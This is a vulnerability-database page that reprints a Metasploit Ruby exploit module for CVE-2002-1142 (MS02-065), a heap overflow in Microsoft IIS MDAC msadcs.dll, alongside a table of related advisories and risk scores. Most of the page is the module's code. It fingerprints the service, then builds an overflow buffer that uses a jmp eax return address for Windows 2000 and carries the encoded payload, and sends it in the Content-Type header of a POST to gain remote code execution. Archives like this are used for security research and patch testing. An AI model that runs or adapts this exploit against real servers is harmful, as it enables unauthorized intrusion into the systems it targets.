Microsoft IIS MDAC msadcs.dll RDS DataStub Content-Type Overflow

🗓️ 07 Jun 2012 00:00:00Reported by patrickType

packetstorm🔗 packetstormsecurity.com👁 39 Views

This module exploits a heap overflow in the Microsoft IIS MDAC msadcs.dll RDS DataStub service

Reporter	Title	Published	Views	Family All 12
0day.today	Microsoft IIS MDAC msadcs.dll RDS DataStub Content-Type Overflow	7 Jun 201200:00	–	zdt
Circl	CVE-2002-1142	8 Jun 201200:00	–	circl
Check Point Advisories	Microsoft Data Access Components Overflow (CVE-2002-1142)	14 Mar 201600:00	–	checkpoint_advisories
CVE	CVE-2002-1142	1 Sep 200404:00	–	cve
Cvelist	CVE-2002-1142	1 Sep 200404:00	–	cvelist
Exploit DB	Microsoft IIS - MDAC 'msadcs.dll' RDS DataStub Content-Type Overflow (MS02-065) (Metasploit)	8 Jun 201200:00	–	exploitdb
Tenable Nessus	Microsoft Data Access Components RDS Data Stub Remote Overflow	22 Nov 200200:00	–	nessus
Metasploit	MS02-065 Microsoft IIS MDAC msadcs.dll RDS DataStub Content-Type Overflow	7 Jun 201211:02	–	metasploit
NVD	CVE-2002-1142	29 Nov 200205:00	–	nvd
securityvulns	CERT Advisory CA-2002-33 Heap Overflow Vulnerability in Microsoft Data	22 Nov 200200:00	–	securityvulns

`##  
# $Id$  
##  
  
##  
# This file is part of the Metasploit Framework and may be subject to  
# redistribution and commercial restrictions. Please see the Metasploit  
# web site for more information on licensing and terms of use.  
# http://metasploit.com/  
##  
  
require 'msf/core'  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = NormalRanking  
  
include Msf::Exploit::Remote::HttpClient  
  
def initialize  
super(  
'Name' => 'Microsoft IIS MDAC msadcs.dll RDS DataStub Content-Type Overflow',  
'Description' => %q{  
This module can be used to execute arbitrary code on IIS servers  
that expose the /msadc/msadcs.dll Microsoft Data Access Components  
(MDAC) Remote Data Service (RDS) DataFactory service. The service is  
exploitable even when RDS is configured to deny remote connections  
(handsafe.reg). The service is vulnerable to a heap overflow where  
the RDS DataStub 'Content-Type' string is overly long. Microsoft Data  
Access Components (MDAC) 2.1 through 2.6 are known to be vulnerable.  
},  
'Author' => 'patrick',  
'Version' => '$Revision$',  
'Platform' => 'win',  
'References' =>  
[  
['OSVDB', '14502'],  
['BID', '6214'],  
['CVE', '2002-1142'],  
['MSB', 'ms02-065'],  
['URL', 'http://archives.neohapsis.com/archives/vulnwatch/2002-q4/0082.html']  
],  
'Privileged' => false,  
'Payload' =>  
{  
'Space' => 1024,  
'BadChars' => "\x00\x09\x0a\x0b\x0d\x20:?<>=$\\/\"';=+%#&",  
'StackAdjustment' => -3500,  
},  
'DefaultOptions' =>  
{  
'EXITFUNC' => 'seh', # stops IIS from crashing... hopefully  
},  
'Targets' =>  
[  
# patrickw tested OK 20120607 w2kpro en sp0 msadcs.dll v2.50.4403.0  
[ 'Windows 2000 Pro English SP0', { 'Ret' => 0x75023783 } ], # jmp eax ws2help.dll  
],  
'DefaultTarget' => 0,  
'DisclosureDate' => 'Nov 20 2002'  
)  
  
register_options(  
[  
OptString.new('PATH', [ true, "The path to msadcs.dll", '/msadc/msadcs.dll']),  
], self.class)  
end  
  
def check  
res = send_request_raw({  
'uri' => datastore['PATH'],  
'method' => 'GET',  
})  
if (res and res.code == 200)  
print_status("Server responded with HTTP #{res.code} OK")  
if (res.body =~ /Content-Type: application\/x-varg/)  
print_good("#{datastore['PATH']} matches fingerprint application\/x-varg")  
Exploit::CheckCode::Detected  
end  
else  
Exploit::CheckCode::Safe  
end  
end  
  
def exploit  
sploit = rand_text_alphanumeric(136)  
sploit[24,2] = Rex::Arch::X86.jmp_short(117)  
sploit << [target['Ret']].pack('V')  
sploit << payload.encoded  
  
data = 'Content-Type: ' + sploit  
  
res = send_request_raw({  
'uri' => datastore['PATH'] + '/AdvancedDataFactory.Query',  
'headers' =>  
{  
'Content-Length' => data.length,  
},  
  
'method' => 'POST',  
'data' => data,  
})  
  
handler  
end  
  
end  
`

07 Jun 2012 00:00Current

0.4Low risk

Vulners AI Score0.4

EPSS0.83043